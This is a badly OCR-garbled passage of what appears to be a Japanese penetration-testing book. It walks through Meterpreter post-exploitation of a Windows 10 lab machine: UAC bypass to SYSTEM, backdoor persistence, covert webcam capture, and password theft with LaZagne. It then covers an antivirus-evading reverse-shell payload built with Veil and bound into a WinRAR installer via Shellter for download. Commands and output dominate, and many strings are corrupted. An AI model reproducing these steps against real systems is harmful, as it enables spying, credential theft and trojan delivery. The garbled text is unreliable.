Kali 側 で セッ ショ ン 1 を 指定 し て Meterpreter プロ ンプ ト を 表示 させ ます 。 





Passwords.txt ファ イル を 探し 出し て 、 ダ ウン ロー ド し て み ま す 。 
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別 Terminal を 起動 し て 、 フ ァイル が 存在 する こと を 確認 し ます 。 





(8⑧) ス クリ ー ン ショ ッ ト を 撮影 する 
screensShot コ マン ド で 、 タ ー ゲ ッ ト 端 末 で 現在 表示 され て いる 画面 の スク リー 
ン シ ョ ッ ト を 撮影 し ます 。 





Files か ら 撮 影 し た 画像 を 開け ます ( 図 456)。 
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FWbTyHSP pe 





コマ ンド か ら 表 示し た けれ ば 、 feh を イン スト ー ル し ます 。 サ イズ を 指定 し て 画 


Foot 個 ka11:<# apt install †eh -y 
Poot 個 ka11:<# feh /root/FMbTyHSP . ]peg 


9 権限 を 昇格 させ る (SYSTEM 権限 を 取得 する ) 


権限 昇格 を 目指 し ます 。 


meterpreter > getu1d 

Server username: DESKTOP-PETKF48\1pus1ron 

meteFTDPeter > getsystem 

[ - ] priv_elevate_getsystem: Operation failed: The environment .」 


1S 1ncorrect. The following was at て tempted : 
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getsystem コ マン ド で 権限 昇格 を 試み まし た が 、 失 敗 し まし た 。UAC 機 能 を 回 
避 す る モジ ュー ル を 探し ます 。 
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この 中 で 「Rank が excellent」 か つ | 日 時 が 新しい ] モジ ュー ル を 探し ます 。 
こ で は 、"exploit/windows/local/bypassuac_sluihijack" を 使い ます 。 
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(UUID: zzg49h]q) Staging x64 payload (297449 bytes) ... 
[*] Meterpreter session 2 opened (19.9.9.2:8443 -> 19.9.9.194:59289) 
at 2918-97-29 23:91:48 +9999 





meterpreter > Meterpreter プ ロン プ ト が 返っ て きた ら 成 功 。 


上 記 の ログ の 円 Executing payload の タイ ミン グ で 、Windows 10 側 で 
PowerShell の 画面 が 表示 され ます ("36) 。Exploit の 実行 が 終わ る と 、 自 動 的 に 閉 
じ ま も し か (73。 

Exploit の 実行 に 成功 し た 場合 、Meterpreter セ モッ ショ ン が 新た に 確立 し 、 
Meterpreter プロ ンプ ト が 返っ て きま す C38)。 も し 最後 に Exploit completed, 
but no session was created.′ と 表示 され た ら 、Exploit の 実行 に 失敗 し て いま す 。 


meterpreter > getu1d 
Server username: DESKTOP-PETKF48\1ipus1ron 

meterpreter > getsystem 

-.-Eot system v1a techn1que 1 (Named Pipe Tmpersonat1on (Tn 
Memory/Admnn ) ) . 

meterDreter > getud 

SerVer username: NT AUTHORTTY\SYSTEN 





SYSTEM 権 限 が 得 ら れ た 。 


⑩ バ ッ ク ド ア を 設置 する 
SYSTEM 権限 を 得 た の で 、 タ ー ゲ ッ ト 端 末 を 掌握 で きま し た 。 後 は 、Windows 
7 の ハッ キン グ で も 解説 し た よう に 、persistence な ど で バ ッ ク ド ア を 設置 し て お 


*36 : Windows 10 の 環境 に よっ て は 、PowerShell の 画面 が 表示 され な いこ と が ある よう で す 。 身 
理 が 早 す ぎ て 日 視 で き な い の か 、 そ も そる も 画面 が 表示 され な い の か 、 実 行 回 数 に 関係 する の か 、 
原因 は 特定 で きま せん で し た 。 

*37 : Exploit の 種類 に よっ て は 、 イ ベン トビ ュー アー な ど が 表示 され ます 。 Exploit の 種類 や 攻撃 
の 成否 に よっ て は 、 自 動 的 に 閉じ な いと いう パターン も あり 、 そ うい っ た 場合 は 操作 者 に 不信 感 
を 与え て し まう か も し れ ま せん 。 


*38 : 1 回 目 の Exploit の 実行 に 失敗 し て も 、2 回 目 に 成功 する こと が あり ます 。 こ の モジ ュー ル が 
うま くい か な い 場 合 は 、 別 の モジ ュー ル (exploiL/windows/loca/bypassuac injection_winsXxs' 


な ど ) を 使用 し て くだ さい 。 オ プシ ョ ン の 指定 や 実行 方 法 は 、 基 本 的 に 同様 で す 。 
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きま す 。 これ は な る べく 早く 実行 し た 方 が よい で し ょ う 。 何ら か の コマ ンド 操作 
に よっ て エラ ー が 発生 し て し まう と 、Meterpreter セ ッ シ ョ ン が 閉じ て し まう 可 
能 性 が ある た めで す 。 


⑬⑪ タ ー ゲ ッ ト 端 末 の Web カメ ラ て 盗撮 する 

ター ゲッ ト 端 末 の Web カ メラ か ら 盗 搬 を 試み ます 。 

ホス ト OS に USB の Web カ メラ を 接続 し ます 。「 デ バイ ス の 準備 が で きま し た 」 
と いう 通知 が 出れ ば 、 ホ スト OS 側 で 認識 され て いま す 。 

仮想 マシ ン で Web カ メラ を 用 いる に は 、Extension Pack を イン スト ー ル し な け 
れ ば な り ま せん 。 本 書 で は すでに イン スト ー ル 済み な の で 、 仮 想 マ シン の メ 
ニュ ー の | デバ イス 」>「Web カ メラ 」 > TUSB Camera」 を 選択 し ます 。 Windows 
10 の スタ ー ト メニ ュー カメ ラ を 選択 し ます 。Web カ メラ が 稼働 する こと を 確認 
し た ら 、 閉 じ ま す 。 

Kali に 戻り 、 別 Terminal で cheess を イン スト ー ル し ます 。 cheese は GNOME 用 
の Web カ メラ アプ リケーション で す (*39)。 





そし て 、 ユ ー ザ ー 権 限 の Meterpreter セ モッ ショ ン に 変え ます ("40)。 





*39 : cheeses を イン スト ー ル し た ら webcam stream コマ ンド が エラ ー な し に 動作 する よう に な り 
まし た 。 


*40 : SYSTEM 権限 で も webcam_stream コマ ンド の 実行 を 確認 し て いま す 。 た だ し 、"Access is 
denied' で エラ ー に な る 場合 も あり まし た 。 
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Meterpreter プロ ンプ ト が 返っ て きた ら 、webcam_lisSt コ マン ド を 実行 し ます 。 
出力 が あれ ば 、 タ ー ゲ ッ ト 端 末 に Web カ メラ が 接続 され て いま す 。 





webcam_stream コ マン ド を 実行 する と 、Firefox が 起動 し て 、Web カ メラ の ス 
トリ ー ム 映像 が 流れ ます ( 図 4-57) 。 
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MetasPiodt webcam -srcam - 10.0.0.104 - Moziia Firefow 


) Metasplot wekcam-s0e_。 X | 
も 。 (EE 7rooUBZXeoVwt.html e 目 Q caari 立 下 4 全 @ 


mi Most Vistrd マ 市 Ofcrsvc Sccuritr WMKall Unur や Kai Docs Kal Toels で Epott-DB 坦 Arcrackrng 
Tnrdet 評 1 の 者 1] 

GS4QFt tpE - 261 昌 - け -16 13:22:46 103BG6 

51 コ tb て ・ PLayiPg 





図 4.57 Web カ メラ の スト リー ム 映 像 が 流れ た 


ここ で 映像 の ペー ジ を 閉じ て も 、Meterpreter セ モ セッション に 戻り ませ ん 
Meterpreter プロ ンプ ト で [Ctrll + [lc] キー を 人 力 し 、 強制 的 に webcam_stream 
コマ ンド を 止め て セッ ショ ン に 戻し ます ., 

また 、webcam_snap コ マン ド を 使う と Web カ メラ を 通じ て 撮影 し 、 そ の 画像 が 
Kali 側 に 保存 され ます 41) 。 そ れ と 同時 に 撮影 し た 画像 が ビュ ー ア ー で 表示 され 
ます 。 


meterpreter > webcam_snap 

|* | Start1ng . 

|+| Got frame 

|*] Stopped 

Mebcam shot saved to: /root て /OKODOome . ]peg 


た 


*41 : 現状 webcam strream コ マン ド や webcam snap コ マン ド は 不安 定 な こと が あり 、 実 行 に 失敗 
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3⑫ パ スワ ー ド を 探し 出す 

Windows シス テム に 格納 され て いる パス ワー ド を 探し 出し ます 。 例 えば 、 プ ラ 
ゥ ザ が 保存 する パス ワー ド 、WiEFi の パス ワー ド な ど が 挙げ られ ます 。 そ れ ぞ れ を 
奪取 する 手法 (C42) は 色々 あり ます が 、 こ こ で は LaZagne と いう ツー ル を 用 いま 
す 。LaZagne と は 、Windows シ ステ ム 内 に ある た くさ ん の パス ワー ド を 抽出 する 
ソフ ト で す (*43)。 パ スワ ー ド を まとめ て 検索 し て くれ る た め 非 常に 強力 で す 。 

Kali 側 で Firefox を 起動 し て 、 次 の URL に アク セス し ます 。 最新 版 の LaZagme の 
"Windows.zip" ファ イル を ダウ ン ロ ー ド し ます (Save す る こと )。 


Releases ・ AlessandroZ/LaZagne ・ GitHub 


https://github.com/AlessandroZ/LaZagne/releases 





別 Terminal で 次 の よう に 入力 し て 、 フ ァイル を 展開 し ます 。 タ ー ゲ ッ ト 端 末 に 
合わ せ て 、64 ビ ッ ト 版 の LaZagne を 用 いま す 。 こ れ を Meterpreter 経 由 で ター 
ゲッ ト 端 末 に アッ プロ ー ド する た め 、root の ホー ム デ ィ レ クト リ に 配置 し ます 。 


ee の てこ アルル に 4 upload コマ ンド は ここ を に ル Y 不 の 





ユー ザー 権限 の Meterpreter プロ ンプ ト で 、 ダ ウン ロー ド フ ォ ル ダー に 移動 し 


*42 : Wihfi 情 報 取得 モジ ュー ル ("pos/windows/wlan/wlan current connection) な ど が あり ま 
す 。 


"43 : https//github.com/ AlessandroZ/LaZagne 
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ます (44)。 なぜなら ば 、 その ユー ザー が シス テム に 保持 し て いる パス ワー ド が 欲 
し いた めで す 。 


meterpreter > cd “"C:\Users\1pus1ron\Downloads" 
meterpreter > pwd ドラ イブ レタ ー を 含む 場合 は ダブ ルク ォ ー ト で 囲ま な いと エラ ー に な る 。 
C:\Users\1pus1ron\Downoads 





meterpreter > upload 1aZagne_x64 .exe 
( 略 ) 
[|*] uploaded  : 1aZagne_x64.exe -> laZagne_x64 .exe 
meterpreter > shel1 
Process 23894 created . 
Channel 2 created. 
Microsoft Mindows [Version 19.9.17134.112 ] 
(c) 2918 Microsof†t Corporation . Al11] rights reserved . 


C:\MTNDOMS\system32>cd "CC:\Users\1pus1Fron\Down1oads" 


cd “"C:\Users\1pus1ron\Downloads" 入力 コマ ンド の エコ ー。 無 視 し て よい 。 


C:\Users\1pus1ron\Downloads>1aZagne_x64 .exe 
1aZagne_x64 .exe 
usage: laZagne_x64.exe [|-h] |[-version ] 
{chats ,mai1s ,a11 , git, svn ,w1indows ,w1 千 1 | 
sysadmin,browsers , games ,databases ,memory , DhD ,maven} 


( 略 ) 


引数 に all を 指定 する と 、 す べ て の 情報 を 探し ます ( 図 458)。 


C:\Users\1pusiron\Down1oads>1aZagne_x64.exe al11 
(パス ワー ド が 見 つか れ ば "Password found !!1" と いう メッ セー ジ が 表示 され る ) 


*44 : より 巧妙 な アッ プロ ー ド 先 と し て は 、 シ ステ ム が 利用 する フォ ル ダ ー (C:\Windows\ 
system32 、C: そ Windows な ど ) や ユー ザー が 普段 確認 し な い フ ォ ル ダー (Temp フ ォ ル ダー、 
ゴミ 箱 で ある C: そ SRecycle.Bin) 、 ソ フト ウェ ア の イン スト ー ル フォル ダー(C:\Program Files ) 
が 向い て いま す 。 
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Fue Edt View Search lerminal Help 


SN1DUS1LFOon\NDOwntOadsS=LaZaOnS X64. ぐ 
X 抽 4 . 己 XE ビ 昌利 


The LaZaqhe PFO] 6 て て 


BAHG BANG ! 


「+] Password found !|l 
生き 1 ト 生 すま ば し 1 る 11111 1 も 
IS 1 1 


「+】 PasSsword found !| 
h て て DS //nO" て Th2.eDLUS . リア ュ ザ 
9Qa1L .CQI 


| Password found 中 
し : https ://steamcommun1ty .com/1og1in/home/ 


PasSwOrH: 





図 4.58 LaZagne の 実行 結果 


13 フ ラウ サザ の 履歴 を 調べ る 


」 | 9 突 オ この ) 4 プ 『 リ +F 用 際 雪 の” 同 3 〆 


み 、 、 簡 作者 の 趣味 ・ 嗜 好 が ね わかり 
ーー ーー ーm 」 子 』』 主 寺 け ー * = ス う テ の 3 _ ea ー 』 ー プ ズ に プア ーー レ arL 1 記 | ーー 
ま り ー プア レ /- 晶 月 (は 、 人 EE ルレ イエ ン ご ーー の リン グ に 活用 ee * め リ 


ここ で は 、 プ ブラ ウザ 履歴 取得 モジ ュー ル (windows/gather/forensics 
browser_history ) を 用 いま す 


mS† explo1t(windows/1ocal1/bypassuac sluihi]ack ) > use post/windows/.- 
gather/forens1cs/browser_history 


msS† post(windows/gather/forensics/browser_history) > set SESSTION 1 
SESSTON => 1 


ms† post(windows/gather/forensics/browser_history) > show options 
Module options (post/windows/gather/forensics/browser_history ) : 


Name Current Setting Required Description 
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/root/msf4/]ocal' ディ レク トリ に 履歴 が 出力 され ます 。 fiie コ マン ド で 出力 
ファ イル を 確認 する と 、SQLite の デー タベース に な っ て いま す 。 





アプ リ 一 覧 の 検索 入力 欄 に "SQLite database" と 入力 し て 、DB Browser for 
SQLite を 起動 し ます 。DB Browser for SQLite は SQLite の デー タベース を GUI で 
管理 で きる ツー ル で す 。 
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IFile」 > 1Open Database」 を 選び 、 指定 する 出力 ファ イル を 指定 し て [Open」 
ボタ ン を 押し ます 。 そ の 際 、 右 下 で | All fies」 を 選択 し て お か な いと 表示 され ま 


せん ( 図 4.59) 。 





の) ャ g に を (ピル テル アル 
履歴 の デー タベース を 
指定 し て 、[Open] ボ 
ルイ 9 た さだ 


DB Browser for SQUite - /roo.msfA/locaUipusirom-ChrcemeHistory-Default-Hiktory- 


Fle Edk View Hep 
SNew Ditabme ぁ * Op Dabate 『 


る を | 


Databae Sucture zowseData EdtPraqmas EnecuteSOL 


JCreme Tle 
Ne _TWPe 
* 目 Tables (12) 
| * 症 dowmloads 


5 Cfeate Index 記 ^todi 


③urls テ ー ブ プル に アク セス し た 
URL が 記録 され て いま す 。 ー 


CREATE TABLEY 


4-59 ブラ ウザ 履歴 の DB 


ーー 


CREATE TABLE d 
CREATE TABLE d 
CREATE TABLE d 
CREATE TABLE k 
CREATE TABLE mn 
CREATE TABLE > 
CREATE TABLE s 


CREATE INDEX K 
CREATE INDEX k 
CREATE INDEX K 


CREATE INDEX z 


Type cf dsta Currentiy mcel- NULL 
brtel 
Remcte 








SOLteg Pot DB5Schema Remote 





urls テ ー ブ ル に アク セス し た URL が 記録 され て いま す 。 | Database Structure」 
タプ ブ の | Tables」 > 「urls」 を 選択 し ます 。 右 クリ ッ ク し て |Browse Table」 を 
選び ます 。 す る と 、[Browse Data」 タプ に 切り 堆 わ り 、 テ ー ブ ル 内 の デー タ が 表 


示さ れ ま す 。 
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人 @ MRU を ソー シャ ル エ ンジ ニア リン グ に 活用 する 

Windows は 最近 使っ た ファ イル や プロ グラ ム の 履歴 を レジ スト リ に 記録 し て い 
ます 。 こ れ を MRU (Most Recently Used : 最近 使っ た リス ト ) と いい ます 。 次 回 
同じ ファ イル や プロ グラ ム を 実行 する と き に 、 す ぐに 選択 で きる と いう 利便 性 を 
向上 させ る た め の 機 能 で す 。 し か し 、 攻 撃 者 に と っ て は ター ゲッ ト の 最近 の 行動 
を 知る た め に 役に立ち ます 。 ア クセ ス 頻 度 の 高い ファ イル や フォ ル ダ ー を 特定 し 
た り 、 ソ ー シ ャ ル エ ンジ ニア リン グ の た め に 活用 し た り で きま す 。 

表 4.9 に MRU の レジ スト リキ ー を 列挙 し ます 。 た だ し 、Windows の バー ジョ ン 
や 環境 に よっ て は 存在 し な いこ と も あり ます 。 


表 4.9 MRU の レジ スト リキ ー 


HKEY_CURRENT_USERYSoftware\Microsoft\Windows\ 
ファ イル 名 を 指定 実行 CurrentVersiOn\Explorer\HunMRU 

ー HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
ケス メロー ラウ アド レス CurrentVersioOn\Explorer\TVpedPaths 
コン ピュ ー タ の 検索 HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
CurrentVersion\Explorer\FindComputerMRU 


ファ イル 検索 HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
CurrentVersion\Explorer\Doc Find Spec MRU 


プリ ンタ ポー ト HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
CurrentVersion\Explorer\PrnPortsMRU 
遇 HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
= * 8 ーー 8 
ee CurrentVersion\Explorer\StreamMRU 
湖 アン チ ウ イル ス を 回 避 す る 


Meterpreter セ モッ ショ ン を 確立 する に は 、 次 の 2 段階 を 突破 し な けれ ば な り ま せ 
ん 。 





1. タ ー ゲ ッ ト 端 末 の 操作 者 に 実行 ファ イル を 実行 きせ る 。 
2. ア ンチ ウイ ルス に よる ウイ ルス 検知 を 回 避 す る 。 


せっ か く 1] を クリ ア し て も 、2 の 段階 で アン チ ウ イル ス に よっ て プロ ッ ク さ れ て 
し まっ て は 意味 が あり ませ ん 。 こ こ で は 、 ア ンチ ウイ ルス の 回 避 を テー マ に し て 
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解説 し ます 。 


全 Vel Framwewok の イン スト ルト 5b ド ド シドニーS ニ = ニ SS= ニ Svw60 ペ パパ 

Veil Framework (Veil と 略す ) と は 、 ア ンチ ウイ ルス を 回 避 す る よう な ペイ 
ロー ド を 生成 する ツー ル 群 で す (*45) 。 Kali に は Veil が イン スト ー ル され て いな い 
の で 、 次 の 手順 で イン スト ー ル し ます 。 


①)Veil Framework を イン スト ー ル する 
Terminal で 次 を 入力 し ます 。 


Foot 同 Kka11:<# apt 1nstal] vei]-evasion 


(少々 時 間 が か か る ) 
次 を 入力 する と 、 初 回 実行 時 に Setunp ス クリ プ ト が 動作 し ます ("46)。 
Poot 同 ka11 : < ve11 


"Are You sure You wish to install VeilLEvasion?" と 入力 を うな が され た ら 、「s」 
(サイ レン トモ ー ド で の イン スト ー ル ) を 入力 し ます 。 こ の イン スト ー ル は か な り 
時 間 が か か り ま す (数 十分 )。Wine の イン スト ー ル 時 に は ダイ アロ グ が 表示 され 
ます が 、 自 動 で 閉じ ます 。 


② イン スト ー ル 完了 を 確認 し て 終了 する 

イン スト ー ル が 完了 する と 、" 還 Done" と 表示 され ます 。 そ の 後 、Veil が 実行 さ 
れ て 、 メ イン メニ ュー が 表示 され ます ( 図 4460)。 こ こ で は exit コマ ンド を 入力 し 
て 、Veil を いっ た ん 終了 させ ます 。 


*45 : https//www.vellLframework.com/ 


*46 バー ジョ ン に よっ て は 、 ス クリ プ ト 名 が "vejl で は な く 、"vejlLevasion の こと が あり ます 。 
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oO)kal, ・ 


FIIE EdKE View Search Iiermanal Help 
49 


Go huke the wime folder op を ュ on 


[If 0U hAVG NPV @FFOWS「 


-/Ue3t.DY ・--SOtMUD' ahOH SeLect th 還 


CoWptetely 人 xit 
上 で OTT3 て 10T 
List ava1table { 


り e1 1 


SDEC1T1C て 


LnOL 


EE- 


和 11 5 


り e]1 1 CQf1cUTAT1nQOIi 





図 4.60 Veil の イン スト ー ル 直後 


人 で Veil で ペイ ロー ド を 作成 する 


Veil を 起動 する 


Veil を 起動 する に は 、 次 の よう に 入力 し ます 。 す る と 、Veil の メイ ン メ ニュ ー が 


表示 され ます 


Foot 央 a11:<# Vei] 


Main Menu 
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②Veil を 最新 化す る 

ウイ ルス 検知 と ウイ ルス 回 避 の 技術 は 、 互 い に 進 化し て いま す 。 そ の た め 、 な 
る べく ウイ ルス の 回 避 の 成功 率 を 上 げ る た め に 、Veil を 最新 化し て お くべ き で す 。 
オイ ンタ ーネット に アク セス で きる よう に し て お き 、 update コ マン ギド を 実行 し ま 
す 。 


3 ツール を 選択 する 
Evasion と Ordnance の 2 つの ツー ル が ロー ド さ れ ま し た 。 こ こ で は 、 ア ンチ ウ 
イル ス を 回 避 し た い の で 、 次 の よう に 入力 し ます 。 
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④ ペ ベイ ロー ド を 選択 する 
次 に ペイ ロー ド を 選択 する わけ で す が 、 ど の よう な も の が ある の か 一 覧 表示 し 
ます 。 





22 番 に "powershell/meterpreter/rev_tcp.py' が ある の で 、 これ を 用 いま す ("47)。 
Description か ら 、Windows 向 け の リバ ー ス シェ ル で ある こと が わか り ま す 。 





"47 : 組み 込ま れ て いる ペイ ロー ド に よっ て 、 番 号 は 異な り ま す 。 自 分 の シス テム に 合わ せ て 読み 
換え て くだ さい 。 
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DOMAIN X Optional1: Required internal domain 


HOSTNAME X Optiona1: Required system hostname 
LHOST IP of the Metasploit handler 

LPORT 4444 Port of the Metasploit handler 
MINBROMSERS FALSE Minimum of 2 browsers 

MINPROCESSES X Minimum number of processes running 
MINRAM FALSE Require a minimum of 3 gigs of RAM 
PROCESSORS X Optional1 : Min1imum number Of DrOcesSOrSs 
SLEEP X Optional: Sleep "Y" seconds, check if† 
accelerated 

USERNAME X Optional: The required user accOount 
USERPROMPT FALSE Mindow pops uD Drior to payload 
UTCCHECK FALSE Check that system isn't using UTC time zone 
VTRTUALPROC FALSE Check for known VM procesSseSs 


Available Commands: 


back Go back to Veil-Evasion 

ex1 ト Completely ex1t Vei1 
generate Generate the payload 

Options Show the shellcode's options 
set Set shel1code option 


[powershe11/meterpreter/rev_tcp>>] : set LHOST 19.9.9.2 IS 
[c/meterpreter/rev tcp>>] : options を 指定 。 


(オプ ショ ン 内 容 を 表示 する ) 





5) ベ イロ ー ド を 作成 する 
generate コ マン ド を 入力 し て 、 ペ イロ ー ド を 作成 し ます 。 デ フォ ルト の ペイ 
ロー ド 名 は "payload に な っ て いま す が 、 こ こ で は evil3" と 指定 し ます ("48) 。 


*48: すでに evil3.exe が 存在 する 場合 に は 、evil31.exe に な り ま す 。 過去 に 生成 され た ペイ ロー 
ド の 中 間 フ ァイル や 実行 ファ イル を 消す 場合 に は 、clean コマ ンド を 実行 し ます 。 


Vei]/Evasion> : clean 
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画 生成 され た ペイ ロー ド の パス 


| IEnterl」 キ ー を 押す と 、 メ イン メニ ュー に 戻る 





(⑥)Veil か ら 抜 ける 
exit コ マン ド を 入力 し て 、Veil か ら 抜 け ま す 。 





(⑦ ペ イロ ー ド を デス クト ッ プ に コピ ー す る 
生成 し た ペイ ロー ド を デス クト ッ プ に コピ ビー し ます 。 
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@ Windows Defender の リア ル タ イ ム 保 護 を 回 避 す る 


Veil で 作成 し た "evil3.bat' を Windows 10 で 実行 する と どう な る の か を 確認 し 
ます 。 


① リ バー スシ ェ ル を 待ち 受け る 
Metasploit で リバ ー ス シェ ル を 待ち 受け ます 。 こ の と き 、 ハ ンド ラー に は 、 ペ イ 
ロー ド と し て "windows/meterpreter/reverse_tcD' を 指定 し ます 。 





② ペ イロ ー ド を 外部 か ら ダ ウン ロー ド で きる フォ ル ダ ー に 移動 する 
"evil3.bat' ファ イル を 外部 か ら ダ ウン ロー ド で きる 場所 に 置き ます 。 





3⑬ ペイ ロー ド を ダウ ン ロ ー ド する 
Windows 10 で Windows Defender の リア ル タ イ ム 保 護 が 有効 で ある こと を 確 
認 し ます 。 
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ブラ ウザ を 開い て 、 http://10.0.0.2/share に アク セス し 、evil3.bat ファ イル を ダ 
ウゥ ウン ロー ド し ます 。 こ の 時 点 で は ウイ ルス と し て 検知 され ませ ん ( 何 も 警 告 が 出 
な い ) ("49)。 


(④ ペ イロ ー ド を 実行 する 

evil3.bat ファ イル を ダブ ルク リッ ク す る と 、Windows Defender SmartScreen 
の 警告 画面 が 出 ま す 。 こ れ は 一 種 の 注意 喚起 の よう な も の な の で 、 多 く の ユ ー 
ザー は 無視 し て 「 詳 細 情 報 ] か ら [実行 ] ボタ ン を 押す で し ょ う 。 実行 する と 一 
瞬 だ け コ マン ド プ ロン プ ト の 画面 が 表示 され ます 。 


5)Meterpreter セ ッ シ ョ ン が 確立 する 
Kali 側 に 反応 が あり 、Meterpreter セ モッ ショ ン が 確立 し ます 。 


[*] Started reverse TCP handler on 19.9.9.2:4444 

[*] Sending stage (179779 bytes) to 19.9.9.194 

[*] Meterpreter session 2 opened (19.9.9.2:4444 -> 
19 .9.9.194 : 49995 ) at 2918-98-91 16:91:59 +9999 





meterDPeter > Meterpreter プ ロン プ ト が 返る 。 


も し 、 Meterpreter プロ ンプ ト が 返っ て こない 場合 、 セ キュ リティ ソフ ト の 何ら 
か の 機能 で プロ ッ ク さ れ て いる 可能 性 が あり ます 。 Windows Defender の 定義 ファ 
イル を 最新 化し た と ころ 、 ダ ウン ロー ド で は 検知 され ませ ん で し た が 、 実 行 時 に 
検知 され て し まい まし た 。 こ の 場合 、 Wmdows 10 の 画面 に は 何 の ア クシ ョ ン も な 
く 、Kali 側 に も 接続 が きま せん 。 そ の た め 、 何 ら か の 設定 ミス か と 思い が ち で す 
が 、Windows Defender の 検知 の 履歴 に 記録 が 残っ て いま し た ( 図 4-61)。 


*49 : 検知 きれ る か どう か は 、 ア ンチ ウイ ルス ソフ ト の 種類 や 定義 ファ イル に より ます 。 
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Win<owt Deemcse ぜ キ ュ リ ティ ぜ ソ ケー 


Trojan:PowerShell/Leivion.P 


谷合 し バル : 車 大 
付 態 : 検 外 済み 


日 付 : 2018/0801 





推 因 さ れる 名 作 : 内 戚 を プロ ッ ク し ます 。 
区 分 : トロ イ の 木 証 
詳細 - こり の ブログ ラム は 危 咲 で あり 、 攻 研 者 か ら の コマ ンド を 実行 し ます 。 
roial 詳細 情報 
] コー イキ ー 3 は うこ 
amsc PowerShell_C\WIindows\syswow も 4\wl 
\y1.0\powershellexe_10.0.16299.15000OO00 





図 4.61 検知 の 履歴 


ペイ ロー ド に 別 フ ァイル を 結合 する 

ター ゲッ ト に ペイ ロー ド を 実行 させ た と し て も 、 何 の ア クシ ョ ン も な か っ た り 、 
一 瞬 だ け で も 何 か の 画面 が 表示 され た りす る の で 、 不審 に 思わ れ て し まい ます 。 
そこ で 、 ペ イロ ー ド に 別 の ファ イル を 結合 し 、 結合 後 の フ ァイル の 実行 時 に 2 つの 
プロ グラ ム を 起動 させ る と いう 手法 が あり ます 。 こ の 手法 を バイ ンド (bind)、 そ 
れ を 実現 する プロ グラ ム を バイ ンダ ー (binder) と 呼び ます 。 例え ば 、 ペイロード 
に 画像 ファ イル を 結合 する こと で 、 裏 で ペイ ロー ド を 実行 させ る と 同時 に 、 表 で 
画像 を 表示 で きま す 。 結果 と し て 、 画 像 が ペイ ロー ド を 隠蔽 し て いる よう な 状況 
に な り ま す 。 

この 手法 は 、 昔 か ら 存 在 し まし た 。 例 えば 、 ト ロイ の 木馬 (*500 に ゲー ム の プロ 
グラ ム を 結合 し て 、 タ ー ゲ ッ ト に 結合 後 の フ ァイル を 実行 させ る よう に 誘導 し ま 
す 。 タ ー ゲ ッ ト が その ゲー ム に 魅力 を 感じ て 実行 し て し まえ ば 、 表 で は ゲー ム が 
起動 し ます が 、 そ の 裏 で は トロ イ の 木馬 の 感染 処理 が 実行 され る わけ で す ("51) 。 


*50 : も う 少 し 正確 に いう と トロ イ の 木馬 の サー バー プロ グラ ム (ター ゲッ ト に 実行 きせ る プ ブログ 
ラム ) の こと で す 。 

51 : スマ ホ の 世界 で は アン チ ウ イル スソ フト が それ ほど 普及 し て いな いた め 、 ゲ ー ム の apk フ ァ 
イル に ペイ ロー ド を バイ ンド する と いう 手法 は 有効 と いえ ます 。 
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粘 合 す る ファ イル の 形式 に よっ て 、 具 体 的 な 結合 方 法 は 変わ り ま す 。 音 に 使わ 
れ て いた トロ イ の 木馬 用 の 結合 アプ リ を 使っ て も 実現 で きま す が 、Windows 10 で 
は 実行 で き な い 可能 性 が あり ます 。 こ こ で は 、 Windows 10 や Kali で 可能 な 方 法 を 
紹介 し ます 。 


仙 Shellter で ベイ ロー ド と exe ファ イル を バイ ンド する 
Shellter 内 に ペイ ロー ド 自 体 が 組み 込ま れ て いる の で 、 事前 に 作っ て お く 必 要 は 
あり ませ ん 。 


(①exe ファ イル を 用 意 す る 

表 で 起動 し 、 ペ イロ ー ド を 隠す exe ファ イル を 用 意 し ます 。 こ こ で は 、 WinRAR 
5.60 (32 ビ ッ ト 版 ) の イン スト ー ラ ー ("wrar560.exe") を 用 いま す 。Kali に ダウ ン 
ロー ド し て 、 デ スク トッ プ に 配置 し て お きま す 。 


②)Shellter を イン スト ー ル する 
Shellter を イン スト ー ル し ます (*52) 。 


rootka11:< せ apt insta]1 shellter 
(3)Shellter を 起動 する 
Terminal で 次 の よう に 入力 する と 、Wine を 通じ て Shellter の 画面 が 開き ます 


( 図 4-62) 。 


Poo て 條 ka11:-# she11ter 


*52 : Shellter , AV Evasion Artware (https//www.shellterprojectcom/) か ら も ダウ ン ロ ー ド で 
きま す 。 た だ し 、 Shellter 本 体 が Windows 10 の Windows Defender SmartScreen や Chrome の ア 
ンチ ウイ ルス 機能 に 検知 され る こと が あり ます 。 
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Shell7er 





図 4.62 Shellter の 起動 画面 


上 > 


ハイ ンド の 指定 を する 


と キミ ニモ ーー そい 住 オ 。 の カー そ カト ニュイ オーー 
対話 式 で 進み の で 、 次 の よう に 指定 し ます 


Choose Operation Mode : AA (Auto : 目 動 ) 


PE Target : /root/Desktop/wrar560.exe 


DisASM.dll was created successfullyl と 表示 され る と 、 画面 上 部 で Instructions 
の 数 字 が カウ ント アッ プ す る 。 し ば らく 待つ 
* Enable Stealth Moder : Y 


s Use a liSted payload or custom?7: し 一 ここ で は リス ト か ら 選 ぶ ( 図 4-63) 


Ok 
* Select payload by index : 1 一 reverse_tcDp を 指定 
s SET LHOST : 10.00.2 
soS じ LT LPORT : 4444 
'53: す で に ペイ ロー ド を 作成 済み で あれ ば ぱ 、 custom を 選び ます 。 本 来 で あれ ば アン チ ウ イル ス を 


hr に アプ ア デイ 1 マデ 。 対 ナ た 。- ま ご 、』 1 ーー 二 . 1 へ 
回 計 す る ペイ ロー ド を 用 いた 方 が よい で し ょ う 
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いきま すす で 本 ます すま きす すす まそ すす 相本 ま ・ 


上 ュ FSt Stade F1L て ter1nd 


すさ ュー ルオ ルオ エ ャ オ ャ エキ ルル エサ オ エエ ルオ オオ エキ テオ 


FLLtEF1LIQ TLNE ADDFOX: G.COOZ52 


Enahle Stealth Nde2 (7zZH) : 


Lst を ed payLoac Or Custonm の !L 





図 463 ペイ ロー ド の リス ト 


| 】 


最後 は 、[Enter] キー で 抜け ます 3 


5 バイ ンド され た ファ イル を 外部 か ら タ ウン ロー ド で きる 場所 に 配置 する 
章 定 し た exe ファ イル (/root/Desktop/wrar560exe ) に ペイ ロー ド が バイ ンド 


され まし た 。 外部 か ら ダ ウン ロー ド で きる 場所 に 配置 


Poot 仙 ka11:< 芋 CD /root/Desktop/wrar569 .exe /var/www/html/share/ 


POOot 細 ka11:- 革 seTv1ce apache2 restart 
な お 、 元 の exe フ ァイル は 、/root/Shellter_Backups ディ イレ クト リ に 保管 され 


C て いま す , 


